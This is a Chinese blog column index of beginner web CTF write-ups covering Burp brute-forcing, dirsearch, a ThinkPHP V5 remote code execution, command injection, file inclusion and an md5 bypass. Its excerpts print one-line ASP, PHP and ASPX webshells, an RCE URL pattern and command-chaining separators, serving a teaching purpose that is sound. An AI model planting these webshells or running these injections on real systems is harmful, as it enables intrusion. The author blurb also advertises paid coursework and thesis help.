
WEB-CTF。
文章平均质量分 55
ad_m1n
承接大学生各类计算机课程设计、项目、竞赛指导,项目申报书、ppt,开题中期结题报告;竞赛项目代码等
cs专业保研定位、简历指导、联系导师、邮件文书等
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
bp爆破功能的用法
透过XCTF的一道题目来学习使用这个功能。题目是ics-06,反正就是爆破id值。一、先拦截请求,发送到测试器二、设置爆破的位置再设置爆破的词典相关的数据。三、过滤并查看结果。这个过滤很重要,你要不过滤的话他跟别的请求就混在一起了,但是实际上他们的长度是不一样的,我们点击那个”长“就可以把不合群的那个请求筛选出来。...原创 2021-11-18 22:02:54 · 4459 阅读 · 0 评论 -
dirsearch目录爆破工具的用法
(1条消息) 目录爆破工具dirsearch_Jiajiajiang_的博客-优快云博客_dirsearch下载原创 2021-10-27 20:47:11 · 494 阅读 · 0 评论 -
PHP框架漏洞
来自XCTF的php_rce.(RCE就是远程入侵检测,包括代码注入和命令执行漏洞)很奇特的一个页面。我们知道ThinkPHP V5是一个PHP框架,于是我们到github上寻找这个框架的漏洞,这是一个很好的思路点,上github上找框架的漏洞。那这么多漏洞我们选择哪个呢?我们看到了熟悉的system和phpinfo这两条。system对我们很有用,后面哪个vars[1][]=命令。例如我们执行:phpinfo()http://111.200.241.244:55994/?s...原创 2021-10-15 20:12:55 · 3106 阅读 · 0 评论 -
命令执行漏洞和代码执行漏洞
一、命令执行漏洞当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。由于服务器端没有针对执行函数和对用户提交的内容进行过滤,所以产生了恶意命令。一道例题如下:恶意命令的格式command1&command2 两个命令同时执行,前面执行不成功后面也执行command1&&am...原创 2021-10-15 19:11:47 · 1330 阅读 · 0 评论 -
WEB-一句话木马
题目来自于XCTF的webshell。题型就是一句话木马:1.常见的一句话木马 asp一句话木马: <%execute(request("value"))%> php一句话木马: <?php @eval($_POST[value]);?> aspx一句话木马: <%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%>工具:中国菜刀。或者蚁剑。...转载 2021-10-15 18:38:35 · 1381 阅读 · 0 评论 -
WEB-文件包含漏洞
一、文件包含入门。参照这个大佬总结的文章,是我搜到的资料中写的相当不错的:(11条消息) CTF中文件包含漏洞总结_Lethe's Blog-优快云博客_ctf 文件包含①:下面记录一个最简单的文件包含漏洞,用于入门。题目来自于moectf新生赛的web。(出的真不错,对我们小白来说很友好)打开这个网址之后出现了下面这段代码:这就是很明显的文件包含。我们需要通过get请求发送值为file参数复制。<?phperror_reporting(0);if(i...原创 2021-09-26 18:49:44 · 909 阅读 · 0 评论 -
moectf之绕过md5+同时向浏览器发送get、post请求。
题目来源:moectf。首先打开给出的网址:网址呈现的代码如下,而且题目中说了,提示我们绕过md5验证。<?phperror_reporting(0);include_once "flag.php";$a=$_GET['a'];$b=$_POST['b'];if(isset($a)){ if($a!=$b&&md5($a)===md5($b)){ echo $flag; }else{ echo 'try ag..原创 2021-09-20 21:41:37 · 1139 阅读 · 0 评论